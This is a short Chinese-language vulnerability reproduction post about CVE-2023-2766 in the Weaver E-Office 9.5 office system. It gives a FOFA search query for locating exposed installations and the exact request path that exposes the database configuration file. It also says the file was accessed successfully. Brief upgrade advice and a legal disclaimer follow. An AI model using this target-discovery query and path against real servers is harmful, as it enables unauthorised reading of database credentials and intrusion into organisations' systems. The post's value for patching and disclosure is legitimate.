簡(jiǎn)介

Weaver E-Office是中國(guó)泛微科技（Weaver）公司的一個(gè)協(xié)同辦公系統(tǒng)。

Weaver E-Office 9.5版本存在安全漏洞。攻擊者利用該漏洞可以訪問(wèn)文件或目錄。

漏洞編號(hào)：CVE-2023-2766

漏洞復(fù)現(xiàn)

FOFA語(yǔ)法：

app="泛微-EOffice"

訪問(wèn)界面如下：

POC：/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini

拼接URL進(jìn)行訪問(wèn)：

https://IP:PORT//building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini

成功訪問(wèn)到數(shù)據(jù)庫(kù)配置文件。

修復(fù)建議

廠商已發(fā)布升級(jí)補(bǔ)丁以修復(fù)漏洞，升級(jí)至新版本

免責(zé)聲明

文章僅做經(jīng)驗(yàn)分享用途，切勿當(dāng)真，未授權(quán)的攻擊屬于非法行為！利用本文章所提供的信息而造成的任何直接或者間接的后果及損失，均由使用者本人負(fù)責(zé)，作者不為此承擔(dān)任何責(zé)任，一旦造成后果請(qǐng)自行承擔(dān)！！！

---

結(jié)語(yǔ)

沒(méi)有人規(guī)定，一朵花一定要成長(zhǎng)為向日葵或者玫瑰。